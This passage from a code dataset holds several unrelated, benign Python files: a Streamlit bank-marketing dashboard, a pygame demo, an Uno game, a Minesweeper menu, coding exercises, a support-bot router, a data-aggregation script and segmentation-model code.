sidebar.')\n\nif option == 'Age':\n st.header('Age frequencies')\n st.write('Here are the age frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n age_freq = sns.countplot(x=bank_data['age'])\n age_freq.set_xticklabels(age_freq.get_xticklabels(), rotation=40, ha=\"right\")\n age_freq.xaxis.set_major_locator(ticker.MultipleLocator(5))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_age_freq = sns.countplot(x=yes_df['age'])\n yes_age_freq.set_xticklabels(yes_age_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_age_freq.xaxis.set_major_locator(ticker.MultipleLocator(5))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_age_freq = sns.countplot(x=no_df['age'])\n no_age_freq.set_xticklabels(no_age_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_age_freq.xaxis.set_major_locator(ticker.MultipleLocator(5))\n st.pyplot(fig3)\n\nif option == 'Duration':\n st.header('Duration frequencies')\n st.write('Here are the duration frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n duration_freq = sns.countplot(x=bank_data['duration'])\n duration_freq.set_xticklabels(duration_freq.get_xticklabels(), rotation=40, ha=\"right\")\n duration_freq.xaxis.set_major_locator(ticker.MultipleLocator(100))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_duration_freq = 
sns.countplot(x=yes_df['duration'])\n yes_duration_freq.set_xticklabels(yes_duration_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_duration_freq.xaxis.set_major_locator(ticker.MultipleLocator(100))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_duration_freq = sns.countplot(x=no_df['duration'])\n no_duration_freq.set_xticklabels(no_duration_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_duration_freq.xaxis.set_major_locator(ticker.MultipleLocator(100))\n st.pyplot(fig3)\n\nif option == 'Job':\n st.header('Job frequencies')\n st.write('Here are the job frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n job_freq = sns.countplot(x=bank_data['job'])\n job_freq.set_xticklabels(job_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_job_freq = sns.countplot(x=yes_df['job'])\n yes_job_freq.set_xticklabels(yes_job_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_job_freq = sns.countplot(x=no_df['job'])\n no_job_freq.set_xticklabels(no_job_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig3)\n\nif option == 'Education':\n st.header('Education frequencies')\n st.write('Here are the education frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n education_freq = sns.countplot(x=bank_data['education'])\n education_freq.set_xticklabels(education_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_education_freq = sns.countplot(x=yes_df['education'])\n yes_education_freq.set_xticklabels(yes_education_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_education_freq = sns.countplot(x=no_df['education'])\n no_education_freq.set_xticklabels(no_education_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig3)\n\nif option == 'Default':\n st.header('Default frequencies')\n st.write('Here are the default frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n default_freq = sns.countplot(x=bank_data['default'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_default_freq = sns.countplot(x=yes_df['default'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_default_freq = sns.countplot(x=no_df['default'])\n st.pyplot(fig3)\n\nif option == 'Housing':\n st.header('Housing frequencies')\n st.write('Here are the housing frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n housing_freq = sns.countplot(x=bank_data['housing'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_housing_freq = sns.countplot(x=yes_df['housing'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_housing_freq = sns.countplot(x=no_df['housing'])\n st.pyplot(fig3)\n\nif option == 'Loan':\n st.header('Loan frequencies')\n st.write('Here are the loan frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n loan_freq = sns.countplot(x=bank_data['loan'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_loan_freq = sns.countplot(x=yes_df['loan'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_loan_freq = sns.countplot(x=no_df['loan'])\n st.pyplot(fig3)\n\nif option == 'Contact':\n st.header('Contact 
frequencies')\n st.write('Here are the contact frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n contact_freq = sns.countplot(x=bank_data['contact'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_contact_freq = sns.countplot(x=yes_df['contact'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_contact_freq = sns.countplot(x=no_df['contact'])\n st.pyplot(fig3)\n\nif option == 'Previous outcome':\n st.header('Previous outcome frequencies')\n st.write('Here are the previous outcome frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n poutcome_freq = sns.countplot(x=bank_data['poutcome'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_poutcome_freq = sns.countplot(x=yes_df['poutcome'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_poutcome_freq = sns.countplot(x=no_df['poutcome'])\n st.pyplot(fig3)\n\nif option == 'Previous campaign':\n st.header('Previous campaign frequencies')\n st.write('Here are the previous campaign frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n previous_freq = sns.countplot(x=bank_data['previous'])\n previous_freq.set_xticklabels(previous_freq.get_xticklabels(), rotation=40, ha=\"right\")\n previous_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_previous_freq = sns.countplot(x=yes_df['previous'])\n yes_previous_freq.set_xticklabels(yes_previous_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_previous_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_previous_freq = sns.countplot(x=no_df['previous'])\n no_previous_freq.set_xticklabels(no_previous_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_previous_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig3)\n\nif option == 'Campaign':\n st.header('Campaign frequencies')\n st.write('Here are the campaign frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n campaign_freq = sns.countplot(x=bank_data['campaign'])\n campaign_freq.set_xticklabels(campaign_freq.get_xticklabels(), rotation=40, ha=\"right\")\n campaign_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_campaign_freq = sns.countplot(x=yes_df['campaign'])\n yes_campaign_freq.set_xticklabels(yes_campaign_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_campaign_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_campaign_freq = sns.countplot(x=no_df['campaign'])\n no_campaign_freq.set_xticklabels(no_campaign_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_campaign_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig3)\n\nif option == 'Last contact date':\n st.header('Last contact date frequencies')\n st.write('Here are the last contact frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n df_count = bank_data[['lc_date', 'y']].groupby(['lc_date']).count().reset_index()\n df_count_date = px.histogram(x=df_count['lc_date'],\n y=df_count['y'])\n st.plotly_chart(df_count_date)\n st.subheader('yes_df')\n yes_df_count = yes_df.groupby(by=[\"lc_date\", \"y\"]).size().reset_index(name=\"counts\")\n yes_df_count_date = px.histogram(x = 
yes_df_count['lc_date'], y = yes_df_count['counts'])\n st.plotly_chart(yes_df_count_date)\n st.subheader('no_df')\n no_df_count = no_df.groupby(by=[\"lc_date\", \"y\"]).size().reset_index(name=\"counts\")\n no_df_count_date = px.histogram(x = no_df_count['lc_date'], y = no_df_count['counts'])\n st.plotly_chart(no_df_count_date)\n\nif option == 'Campaign response':\n st.subheader('Campaign response')\n st.write('Here is the response from the customers to the campaign.')\n fig1 = plt.figure()\n y_freq = sns.countplot(x = bank_data['y'])\n st.pyplot(fig1)\n\nif option == 'Correlation heatmap':\n st.subheader('Correlation heatmap')\n st.write('Here is the correlation matrix plotted in a heatmap for easier visualization.')\n fig1 = plt.figure()\n corr_map = sns.heatmap(bank_data.corr(), annot=True)\n st.pyplot(fig1)\n","sub_path":"streamlit_app/bank_marketing_app.py","file_name":"bank_marketing_app.py","file_ext":"py","file_size_in_byte":11796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"123598551","text":"from pymysql import cursors, connect\nfrom instance.config import MYSQL_CONFIG\n\n\ndef init_group():\n connection = connect(**MYSQL_CONFIG)\n try:\n with connection.cursor() as cursor:\n sql = \"INSERT INTO usergroup(gid, system, admin, user) VALUES (%s, %s, %s, %s)\"\n cursor.execute(sql, (-1, 1, 1, 1)) # System group\n cursor.execute(sql, (0, 0, 0, 1)) # User group\n cursor.execute(sql, (1, 0, 1, 1)) # Admin group\n connection.commit()\n finally:\n connection.close()\n\ninit_group()","sub_path":"init_data.py","file_name":"init_data.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356099475","text":"#SETUP\r\nimport pygame\r\nimport random\r\nimport sys\r\npygame.init()\r\n\r\nmoveLeft = pygame.image.load('8.png')\r\nmoveRight = pygame.image.load('1.png')\r\nmoveUp = pygame.image.load('4.png')\r\nmoveDown = pygame.image.load('3.png')\r\nback = pygame.image.load('background2.png')\r\nspaceship = pygame.image.load('6.png')\r\nenemy1 = pygame.image.load('enemy1.png')\r\nbullet = pygame.image.load('bullet.png')\r\n\r\n\r\nclock = pygame.time.Clock()\r\nUp = False\r\nDown = False\r\nRight = False\r\nLeft = False\r\nwidth = 1200\r\nheight = 900\r\nred = (255,0,0)\r\nblue = (0,0,255)\r\nyellow = (255,255,0)\r\nplayerSize = 125\r\nPlayerPos = [width/2,height-2*playerSize]\r\nbackgroundColour = (0,0,0)\r\ngameDisplay = pygame.display.set_mode((width, height))\r\npygame.display.set_caption('Game')\r\n\r\n\r\n\r\ndef redrawWindow():\r\n gameDisplay.blit(back, (0,0))\r\n if Left:\r\n gameDisplay.blit(moveLeft, (PlayerPos[0],PlayerPos[1]))\r\n elif Right:\r\n gameDisplay.blit(moveRight, (PlayerPos[0],PlayerPos[1]))\r\n elif Up:\r\n gameDisplay.blit(moveUp, (PlayerPos[0],PlayerPos[1]))\r\n elif Down:\r\n gameDisplay.blit(moveDown, (PlayerPos[0],PlayerPos[1]))\r\n else:\r\n gameDisplay.blit(spaceship, (PlayerPos[0],PlayerPos[1]))\r\n \r\n pygame.display.update()\r\n\r\n\r\n#THE USER DOES SOMETHING TO START THE GAME.\r\ngameRunning = True\r\n\r\n#THE GAME LOOP.\r\nwhile gameRunning:\r\n clock.tick(60)\r\n \r\n #HANDLE EVENTS\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n gameRunning = False\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n x = PlayerPos[0]\r\n y = PlayerPos[1]\r\n\r\n if event.key == pygame.K_LEFT:\r\n x-=playerSize\r\n Left = True\r\n Right = False\r\n Down = False\r\n Up = False\r\n\r\n if 
event.key == pygame.K_RIGHT:\r\n x += playerSize\r\n Right = True\r\n Left = False\r\n Down = False\r\n Up = False\r\n\r\n if event.key == pygame.K_UP:\r\n y -=playerSize\r\n Right = False\r\n Left = False\r\n Down = False\r\n Up = True\r\n\r\n elif event.key == pygame.K_DOWN:\r\n y += playerSize\r\n Right = False\r\n Left = False\r\n Down = True\r\n Up = False\r\n else:\r\n Right = False\r\n Left = False\r\n Down = False\r\n Up = False\r\n WalkAmount = 0\r\n PlayerPos = [x,y]\r\n\r\n redrawWindow()\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n'''\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_q:\r\n gameRunning = False\r\n\r\n gameDisplay.fill((255, 255 ,255))\r\n pygame.display.update()\r\n \r\n\r\n#CLEAN UP WHEN FINISHED.\r\npygame.quit()\r\nquit()\r\n\r\n'''\r\n","sub_path":"game1.3.py","file_name":"game1.3.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224229400","text":"import numpy, scipy, sklearn.feature_selection, sys, pandas\nsys.path.append(\"/Users/pwangel/Gene_Analysis\")\nfrom ga_utils import *\n\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.graph_objs import *\nimport plotly.figure_factory as ff\n\n# Read in data \ncommon_genes = numpy.load('/Users/pwangel/Data/Correlation_Arrays/gene_list.npy') #### Read in as I don't want to start again\niu = numpy.triu_indices(len(common_genes),1)\nn_files_to_load = 30\n\nindices_to_loop_over = numpy.array_split(numpy.arange(len(iu[0])), 10)\n\nglobal_data = pandas.DataFrame(index = numpy.arange(len(iu[0])))\nglobal_data['Gene A'] = common_genes[iu[0]]\nglobal_data['Gene B'] = common_genes[iu[1]]\n\nfor i_indices in indices_to_loop_over:\n\n print(\"\\nMoving through index %d-%d / %d\" %(i_indices[0], i_indices[-1], len(iu[0])))\n\n temp_RNASeq_data = numpy.empty(shape=(n_files_to_load, len(i_indices)))\n temp_Microarray_data = numpy.empty(shape=(n_files_to_load, len(i_indices)))\n\n for i_file in range(0,n_files_to_load):\n\n print('File:%d'%i_file)\n temp_RNASeq_data[i_file,:] = numpy.load('/Users/pwangel/Data/Correlation_Arrays/RNASeq_array_%d.npy'%i_file)[i_indices]\n temp_Microarray_data[i_file,:] = numpy.load('/Users/pwangel/Data/Correlation_Arrays/Microarray_array_%d.npy'%i_file)[i_indices]\n\n global_data.loc[i_indices, 'Microarray Median'] = numpy.nanmedian(temp_Microarray_data, axis=0) \n global_data.loc[i_indices, 'RNA Median'] = numpy.nanmedian(temp_RNASeq_data, axis=0) \n global_data.loc[i_indices, 'Microarray Std'] = numpy.nanstd(temp_Microarray_data, axis=0) \n global_data.loc[i_indices, 'RNA Std'] = numpy.nanstd(temp_RNASeq_data, axis=0) \n global_data.loc[i_indices, 'Microarray+RNASeq Median'] = numpy.nanmedian(temp_Microarray_data+temp_RNASeq_data, axis=0) \n global_data.loc[i_indices, 'Microarray+RNA Std'] = numpy.nanstd(temp_Microarray_data+temp_RNASeq_data, axis=0) \n\nglobal_data.sort_values(by='Microarray+RNASeq Median', axis=0,ascending=False, inplace=True)\n\nglobal_data.to_pickle('/Users/pwangel/Data/Correlation_Arrays/sorted_correlations')\n#import_data = pandas.read_pickle('/Users/pwangel/Data/Correlation_Arrays/sorted_correlations')","sub_path":"find_global_trends/aggregate_bootstrap_results.py","file_name":"aggregate_bootstrap_results.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650679544","text":"\"\"\"\n\nFor debugging test module(s) under 
lib/\n\n\"\"\"\n\nfrom lib import NemoTests\nimport IPython\n\nn=NemoTests.NemoTests()\n\n# equD56\nn.setup_equD56()\nn.set_config(\"configs/equD56_quick.yml\")\nn.run_nemo()\n\n# 2008 stuff\nn.setup_south2008()\nn.set_config(\"configs/PSTest_south2008.yml\")\nn.run_nemo()\n#IPython.embed()\n#sys.exit()\n\n# Point sources\n#n.cross_match(\"inputSourcesCatalog.fits\", \"configs/PSTest_E-D56/PSTest_E-D56_optimalCatalog.fits\")\n#n.check_recovered_ratio(\"I\", \"deltaT_c\", tolerance=0.01, SNRKey=\"SNR\", SNRCut=5.0, plotFileName=\"plots/amplitudeRecovery.png\")\n#n.check_recovered_positions(plotFileName=\"plots/positionRecovery.png\")\n\n#c.run_nemo_mass(catalogFileName = \"configs/equD56_quick/mocks/mockCatalog_1.fits\")\n","sub_path":"tests/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"609264192","text":"import itertools\nMn = 9999999999\nMx = -Mn\nn = int(input())\nL = list(map(int,input().split()))\ncnt = list(map(int,input().split()))\np = []\nfor i in range(4):\n for j in range(cnt[i]):\n p.append(i)\n\np.sort()\nfor i in itertools.permutations(p):\n s = L[0]\n for j in range(1,len(L)):\n if i[j-1] == 0:\n s += L[j]\n elif i[j-1] == 1:\n s -= L[j]\n elif i[j-1] == 2:\n s *= L[j]\n else:\n if s > 0:\n s //= L[j]\n else:\n s = -((-s) //L[j])\n Mn = min(Mn,s)\n Mx = max(Mx,s)\nprint(Mx)\nprint(Mn)","sub_path":"BOJ/14000~14999/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323240735","text":"from apps.stp.functions import initial, to_main_menu, show_requests_list, show_requests_list_next, \\\n print_request, start_chat, send_to_chat_text, take_request, drop_request, drop_request_choice, \\\n drop_request_comment, drop_request_with_comment, show_active_requests, show_request_history, \\\n show_request_history_next, user_online, send_close_request\n\n\nclass Router:\n @staticmethod\n def router_text(message, user, tb):\n if user.state == 'stp_initial':\n initial(message, user, tb)\n elif message.text == \"В главное меню\":\n to_main_menu(message, user, tb)\n elif user.state == 'stp_request_drop_comment':\n drop_request_with_comment(message, user, tb)\n elif message.text == \"Список запросов\":\n show_requests_list(message, user, tb)\n elif message.text == \"Мои активные запросы\":\n show_active_requests(message, user, tb)\n elif message.text.startswith('/r'):\n print_request(message, user, tb)\n elif message.text == \"Отключиться от чата\":\n to_main_menu(message, user, tb)\n elif user.state == 'stp_chatting':\n if message.text == 'Показать историю чата':\n show_request_history(message, user, tb)\n elif message.text == 'Клиент в чате?':\n user_online(message, user, tb)\n elif message.text == 'Закрыть заявку':\n send_close_request(message, user, tb)\n else:\n send_to_chat_text(message, user, tb)\n\n @staticmethod\n def route_inline(call, user, tb):\n if user.state == 'stp_request_drop':\n if call.data.startswith('stp_request_drop_yes'):\n drop_request_choice(call, user, tb, 1)\n elif call.data.startswith(\"stp_request_drop_no\"):\n drop_request_choice(call, user, tb, 1)\n elif call.data.startswith(\"stp_request_drop_comment\"):\n drop_request_comment(call, user, tb)\n elif user.state == 'stp_chatting':\n if call.data.startswith('next_chat_page'):\n show_request_history_next(call, user, tb)\n else:\n if 
call.data.startswith('stp_request_show'):\n show_requests_list_next(call, user, tb)\n elif call.data.startswith('stp_request_take_and_chat') or call.data.startswith('stp_request_chat'):\n start_chat(call, user, tb)\n elif call.data.startswith('stp_request_take'):\n take_request(call, user, tb)\n elif call.data.startswith('stp_request_dismiss_request'):\n drop_request(call, user, tb)","sub_path":"apps/stp/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383622195","text":"# NestedEvenSum --> Write a recursive function to return the sum of all even numbers in an object which may contain nested objects\n\ndef nestedEvenSum(obj, sum=0):\n for value in obj.values():\n if type(value) is int:\n if value%2==0:\n sum+=value\n elif type(value) is dict:\n sum+=nestedEvenSum(value)\n else:\n pass\n return sum\n\n\nobj1 = {\n \"outer\": 2,\n \"obj\": {\n \"inner\": 2,\n \"otherObj\": {\n \"superInner\": 2,\n \"notANumber\": True,\n \"alsoNotANumber\": \"yup\"\n }\n }\n}\n\nobj2 = {\n \"a\": 2,\n \"b\": {\"b\": 2, \"bb\": {\"b\": 3, \"bb\": {\"b\": 2}}},\n \"c\": {\"c\": {\"c\": 2}, \"cc\": 'ball', \"ccc\": 5},\n \"d\": 1,\n \"e\": {\"e\": {\"e\": 2}, \"ee\": 'car'}\n}\n\n\nprint(nestedEvenSum(obj1)) #6\nprint(nestedEvenSum(obj2)) #10\n","sub_path":"src/interview_questions/recursionAndDynamicProgramming/easy/nestedEvenSum.py","file_name":"nestedEvenSum.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171265283","text":"from .deck import Deck, PlayerDeck\nfrom .card import ColorCard, SpecialCard, WildCard\n\nfrom .errors import (NotEnoughPlayers, GameNotStarted, GameInProgress, BadCard, WrongPlayer,\n DrawAndSkipPlayer, SkipPlayer, Reversed)\n\nclass UnoGame:\n \"\"\"[summary]\n \n Raises:\n NotEnoughPlayers: [description]\n GameNotStarted: [description]\n WrongPlayer: [description]\n BadCard: [description]\n TypeError: [description]\n GameInProgress: [description]\n \"\"\" \n def __init__(self, players = [], deck_size = 2):\n \"\"\"[summary]\n \n Keyword Arguments:\n players {list} -- [description] (default: {[]})\n deck_size {int} -- [description] (default: {2})\n \"\"\" \n self.started = False\n self.players = players\n self.deck = Deck(deck_size)\n\n # TODO: make first card not a special\n # TODO: handle multiple skips/plus_2s???\n def start_game(self):\n \"\"\"[summary]\n \n Raises:\n NotEnoughPlayers: [description]\n \"\"\" \n if len(self.players) < 2:\n raise NotEnoughPlayers\n\n for player in self.players:\n player.deck = PlayerDeck(self.deck.distribute(7))\n\n self._players_iter = iter(self.players)\n self._current_player = next(self._players_iter)\n\n self.history = [self.deck.pop()]\n\n self.started = True\n\n @property\n def last_card(self):\n \"\"\"\n Returns:\n Card -- last played card\n \"\"\" \n return self.history[-1]\n\n def play(self, player, card):\n \"\"\"[summary]\n \n Arguments:\n player {Object} -- any object with a object.deck\n card {Card} -- card to be played\n \n Raises:\n GameNotStarted: [description]\n WrongPlayer: [description]\n BadCard: [description]\n TypeError: [description]\n \"\"\" \n if not self.started: raise GameNotStarted\n if not player == self._current_player: raise WrongPlayer\n \n last_card = self.last_card\n if isinstance(card, (ColorCard, SpecialCard)):\n last_card.compare(card)\n elif isinstance(card, WildCard):\n pass\n else: 
raise TypeError(\"expected type ColorCard || SpecialCard || WildCard not %s.\" % type(card))\n\n player.deck.remove(card)\n self.history.append(card)\n\n try:\n if isinstance(card, (SpecialCard, WildCard)):\n if card.special.startswith(\"+\"):\n draw_amount = int(card.special.split(\"\", 1)[1])\n cards = self.deck.distribute(draw_amount)\n\n player = self._next_player()\n player.deck.extend(cards)\n\n raise DrawAndSkipPlayer(player, draw_amount)\n elif card.special == \"reverse\":\n self.players.reverse()\n raise Reversed\n elif card.special == \"skip\":\n raise SkipPlayer(self._next_player())\n finally:\n self._next_player()\n\n def draw_card(self, player):\n if not self.started: raise GameNotStarted\n if not player == self._current_player: raise WrongPlayer\n\n player.deck.extend(self.deck.distribute(1))\n\n def add_player(self, player):\n \"\"\"\n Arguments:\n player {Object} -- any object, object.deck will be used to store PlayerDeck\n \n Raises:\n GameInProgress: [description]\n \"\"\" \n if self.started: raise GameInProgress\n self.players.append(player)\n\n def _next_player(self):\n try:\n self._current_player = next(self._players_iter)\n except StopIteration:\n self._players_iter = iter(self.players)\n self._current_player = next(self._players_iter)\n finally:\n return self._current_player","sub_path":"uno/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563819425","text":"\n# def earliest_ancestor(ancestors, starting_node):\n# pass\n\ntest_ancestors = [(1, 3), (2, 3), (3, 6), (5, 6), (5, 7), (4, 5), (4, 8), (8, 9), (11, 8), (10, 1)] \t\n \ndef createGraph(ancestors):\n '''Create graph from pairs - reverse relations for DFT'''\n vertices = {}\n for i in ancestors:\n if i[1] not in vertices:\n vertices[i[1]] = set()\n if i[0] not in vertices:\n vertices[i[0]] = set()\n vertices[i[1]].add(i[0])\n return vertices\n\ndef earliest_ancestor(test_ancestors, starting_vertex, visited=None):\n ancestors = createGraph(test_ancestors)\n visited = [False]*(len(ancestors)+1)\n stack = []\n stack.append(starting_vertex)\n path = []\n s = starting_vertex\n\n while stack:\n starting_vertex = stack[-1]\n stack.pop()\n if (not visited[starting_vertex]):\n path.append(starting_vertex)\n visited[starting_vertex] = True\n for node in ancestors[starting_vertex]:\n if (not visited[node]):\n stack.append(node)\n\n if s == path[-1]:\n return -1\n else:\n if path[-1] not in ancestors[path[-2]] and path[-2] < path[-1]:\n return path[-2]\n else:\n return path[-1]\n\n\n\nprint(earliest_ancestor(test_ancestors, 8))\n\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"578660631","text":"from MinesweeperLogic import MineSweeper\nfrom os.path import isfile\nfrom os import remove\nimport json\nimport sys\n\nnew_game = MineSweeper()\n\ndef menu():\n print(\"****************************************\")\n print(\"* MineSweeper \\U0001F431 *\")\n print(\"****************************************\")\n print(\" 1 - Play *\")\n print(\" 2 - Continue *\")\n print(\" 3 - Sair *\")\n print(\"****************************************\\n\")\n option = int(input(\"Choose :\"))\n if option == 1:\n play()\n elif option == 2:\n restoreGame()\n else:\n exitGame\n\ndef play():\n new_game.new_game(5, 5)\n startGame()\n\ndef startGame():\n count = 0 
\n while new_game.death() != \"Died\":\n if new_game.moves_remainings > 0:\n if count != 0:\n print(\"Good Boy\")\n new_game.print_board()\n row = int(input(\"Insert a row :\"))\n col = int(input(\"Insert a column :\"))\n new_game.move(row, col) \n count += 1 \n tryAgain()\n\ndef restoreGame():\n if isfile(\"game.json\"):\n file = open(\"game.json\")\n game = json.loads(file.read())\n new_game.restorar(game)\n file.close()\n startGame()\n else:\n print(\"There aren't any saved games!\\n\")\n\ndef tryAgain():\n print(\" 1 - New game \")\n print(\" 2 - Quit \")\n option = int(input(\"Choose : \"))\n if option == 1:\n menu()\n else:\n exitGame()\n\ndef exitGame():\n sys.exit(0)\n\nmenu()","sub_path":"ynoa/monolith/ViewMinesweeper.py","file_name":"ViewMinesweeper.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490854036","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.model_zoo import load_url as load_state_dict_from_url\nfrom collections import OrderedDict\nimport torch.nn.functional as F\nfrom torch.jit.annotations import Dict\nfrom srcs.Deeplabv3 import DeepLabHead, DeepLabV3\nimport srcs.resnet as resnet\n\n\n\nmodel_urls = {\n 'fcn_resnet50_coco': None,\n 'fcn_resnet101_coco': 'https://download.pytorch.org/models/fcn_resnet101_coco-7ecb50ca.pth',\n 'deeplabv3_resnet50_coco': None,\n 'deeplabv3_resnet101_coco': 'https://download.pytorch.org/models/deeplabv3_resnet101_coco-586e9e4e.pth',\n}\n\nclass _SimpleSegmentationModel(nn.Module):\n __constants__ = ['aux_classifier']\n\n def __init__(self, backbone, classifier, aux_classifier=None):\n super(_SimpleSegmentationModel, self).__init__()\n self.backbone = backbone\n self.classifier = classifier\n self.aux_classifier = aux_classifier\n\n def forward(self, x):\n input_shape = x.shape[-2:]\n # contract: features is a dict of tensors\n features = self.backbone(x)\n\n result = OrderedDict()\n x = features[\"out\"]\n x = self.classifier(x)\n x = F.interpolate(x, size=input_shape, mode='bilinear', align_corners=False)\n result[\"out\"] = x\n\n if self.aux_classifier is not None:\n x = features[\"aux\"]\n x = self.aux_classifier(x)\n x = F.interpolate(x, size=input_shape, mode='bilinear', align_corners=False)\n result[\"aux\"] = x\n\n return result\n\nclass FCN(_SimpleSegmentationModel):\n \"\"\"\n Implements a Fully-Convolutional Network for semantic segmentation.\n\n Arguments:\n backbone (nn.Module): the network used to compute the features for the model.\n The backbone should return an OrderedDict[Tensor], with the key being\n \"out\" for the last feature map used, and \"aux\" if an auxiliary classifier\n is used.\n classifier (nn.Module): module that takes the \"out\" element returned from\n the backbone and returns a dense prediction.\n aux_classifier (nn.Module, optional): auxiliary classifier used during training\n \"\"\"\n pass\n\n\nclass FCNHead(nn.Sequential):\n def __init__(self, in_channels, channels):\n inter_channels = in_channels // 4\n layers = [\n nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),\n nn.BatchNorm2d(inter_channels),\n nn.ReLU(),\n nn.Dropout(0.1),\n nn.Conv2d(inter_channels, channels, 1)\n ]\n\n super(FCNHead, self).__init__(*layers)\n\n\n\nclass IntermediateLayerGetter(nn.ModuleDict):\n \"\"\"\n Module wrapper that returns intermediate layers from a model\n It has a strong assumption that the modules have been registered\n into the model in the same order as they are used.\n This means 
